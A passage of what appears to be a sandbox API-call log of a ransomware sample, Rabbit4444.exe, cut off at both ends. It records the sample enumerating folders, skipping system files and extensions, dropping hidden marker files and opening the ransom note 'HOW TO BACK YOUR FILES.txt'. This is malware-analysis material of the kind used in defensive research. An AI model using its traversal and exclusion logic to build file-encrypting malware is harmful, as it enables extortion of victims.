(lpString1="BackgroundTransferApiGroup", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.066] lstrcmpiW (lpString1="BackgroundTransferApiGroup", lpString2="Rabbit4444.exe") returned -1 [0064.066] lstrcmpiW (lpString1="BackgroundTransferApiGroup", lpString2=".") returned 1 [0064.066] lstrcmpiW (lpString1="BackgroundTransferApiGroup", lpString2="..") returned 1 [0064.066] lstrcmpiW (lpString1="BackgroundTransferApiGroup", lpString2="windows") returned -1 [0064.066] lstrcmpiW (lpString1="BackgroundTransferApiGroup", lpString2="bootmgr") returned -1 [0064.066] lstrcmpiW (lpString1="BackgroundTransferApiGroup", lpString2="pagefile.sys") returned -1 [0064.066] lstrcmpiW (lpString1="BackgroundTransferApiGroup", lpString2="boot") returned -1 [0064.066] lstrcmpiW (lpString1="BackgroundTransferApiGroup", lpString2="ids.txt") returned -1 [0064.067] lstrcmpiW (lpString1="BackgroundTransferApiGroup", lpString2="NTUSER.DAT") returned -1 [0064.067] lstrcpyW (in: lpString1=0x130ec08, lpString2="BackgroundTransferApiGroup" | out: lpString1="BackgroundTransferApiGroup") returned="BackgroundTransferApiGroup" [0064.067] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApiGroup", dwFileAttributes=0x2012) returned 1 [0064.067] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222c0 [0064.067] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x106) returned 0x108ce0 [0064.067] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222c8 | out: ListHead=0xf68b0, ListEntry=0x1222c8) returned 0x122088 [0064.067] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5106299e, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x5106299e, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x5106299e, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BackgroundTransferApiGroup", cAlternateFileName="BACKGR~2")) returned 0 [0064.067] FindClose (in: hFindFile=0x102a90 | out: hFindFile=0x102a90) returned 1 [0064.067] lstrcpyW (in: lpString1=0x130ec08, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.067] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\ac\\inethistory\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.068] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.068] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.068] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.068] CloseHandle (hObject=0x2a0) returned 1 [0064.068] CloseHandle (hObject=0x2cc) returned 1 [0064.068] GetCurrentThreadId () returned 0xd98 [0064.068] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222c8 [0064.068] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApiGroup", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApiGroup") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApiGroup" [0064.068] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0064.068] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222c0 | out: hHeap=0xe0000) returned 1 [0064.068] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApiGroup" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApiGroup") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApiGroup" [0064.068] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApiGroup", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApiGroup\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApiGroup\\" [0064.068] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApiGroup\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApiGroup\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApiGroup\\.BFC0E91B00AE8A0620D3" [0064.069] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApiGroup\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\ac\\inethistory\\backgroundtransferapigroup\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.070] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.073] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.074] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApiGroup\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.074] CloseHandle (hObject=0x2cc) returned 1 [0064.075] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApiGroup") returned 130 [0064.075] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.075] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApiGroup\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x5106299e, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x5106299e, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0xef81d439, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0064.075] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.075] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.075] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.075] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.075] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x5106299e, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x5106299e, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0xef81d439, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.075] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.075] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.075] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.075] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.075] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.075] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef81d439, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef81d439, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef843698, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.075] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.075] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.075] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef81d439, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef81d439, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef843698, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0064.075] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0064.075] lstrcpyW (in: lpString1=0x130ec3e, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.075] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApiGroup\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\ac\\inethistory\\backgroundtransferapigroup\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.076] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.076] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.076] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.076] CloseHandle (hObject=0x2a0) returned 1 [0064.076] CloseHandle (hObject=0x2cc) returned 1 [0064.077] GetCurrentThreadId () returned 0xd98 [0064.077] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122088 [0064.077] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApi", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApi") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApi" [0064.077] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123760 | out: hHeap=0xe0000) returned 1 [0064.077] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122080 | out: hHeap=0xe0000) returned 1 [0064.077] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApi" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApi") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApi" [0064.077] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApi", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApi\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApi\\" [0064.077] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApi\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApi\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApi\\.BFC0E91B00AE8A0620D3" [0064.077] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApi\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\ac\\inethistory\\backgroundtransferapi\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.078] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.080] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.081] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApi\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.081] CloseHandle (hObject=0x2cc) returned 1 [0064.081] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApi") returned 125 [0064.082] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.082] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApi\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x5106299e, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x5106299e, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0xef843698, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102890 [0064.082] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.082] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.082] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.082] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.082] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x5106299e, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x5106299e, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0xef843698, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.082] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.082] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.082] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.082] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.082] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.082] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef843698, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef843698, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef843698, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.082] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.082] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.082] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x5106299e, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x5106299e, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x5106299e, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 1 [0064.082] lstrcmpiW (lpString1="container.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.082] lstrcmpiW (lpString1="container.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.082] lstrcmpiW (lpString1="container.dat", lpString2="Rabbit4444.exe") returned -1 [0064.082] lstrcmpiW (lpString1="container.dat", lpString2=".") returned 1 [0064.082] lstrcmpiW (lpString1="container.dat", lpString2="..") returned 1 [0064.082] lstrcmpiW (lpString1="container.dat", lpString2="windows") returned -1 [0064.082] lstrcmpiW (lpString1="container.dat", lpString2="bootmgr") returned 1 [0064.082] lstrcmpiW (lpString1="container.dat", lpString2="pagefile.sys") returned -1 [0064.082] lstrcmpiW (lpString1="container.dat", lpString2="boot") returned 1 [0064.082] lstrcmpiW (lpString1="container.dat", lpString2="ids.txt") returned -1 [0064.083] lstrcmpiW (lpString1="container.dat", lpString2="NTUSER.DAT") returned -1 [0064.083] lstrcpyW (in: lpString1=0x130ec34, lpString2="container.dat" | out: lpString1="container.dat") returned="container.dat" [0064.083] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApi\\container.dat", dwFileAttributes=0x2022) returned 1 [0064.083] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApi\\container.dat", dwFileAttributes=0x2006) returned 1 [0064.083] lstrlenW (lpString="container.dat") returned 13 [0064.083] lstrlenW (lpString="Rabbit4444") returned 10 [0064.083] lstrcmpiW (lpString1="tainer.dat", lpString2="Rabbit4444") returned 1 [0064.083] lstrlenW (lpString=".dll") returned 4 [0064.083] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0064.083] lstrlenW (lpString=".lnk") returned 4 [0064.083] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0064.083] lstrlenW (lpString=".ini") returned 4 [0064.083] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0064.083] lstrlenW (lpString=".sys") returned 4 [0064.083] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0064.083] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x5106299e, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x5106299e, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x5106299e, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 0 [0064.083] FindClose (in: hFindFile=0x102890 | out: hFindFile=0x102890) returned 1 [0064.083] lstrcpyW (in: lpString1=0x130ec34, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.084] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApi\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\ac\\inethistory\\backgroundtransferapi\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.085] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.085] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.086] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.086] CloseHandle (hObject=0x2a0) returned 1 [0064.087] CloseHandle (hObject=0x2cc) returned 1 [0064.087] GetCurrentThreadId () returned 0xd98 [0064.087] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122368 [0064.087] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCookies", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCookies" [0064.087] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108688 | out: hHeap=0xe0000) returned 1 [0064.087] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122360 | out: hHeap=0xe0000) returned 1 [0064.087] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCookies" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCookies" [0064.087] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCookies", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCookies\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCookies\\" [0064.087] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCookies\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" [0064.087] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\ac\\inetcookies\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.091] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.093] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.094] SetFileAttributesW 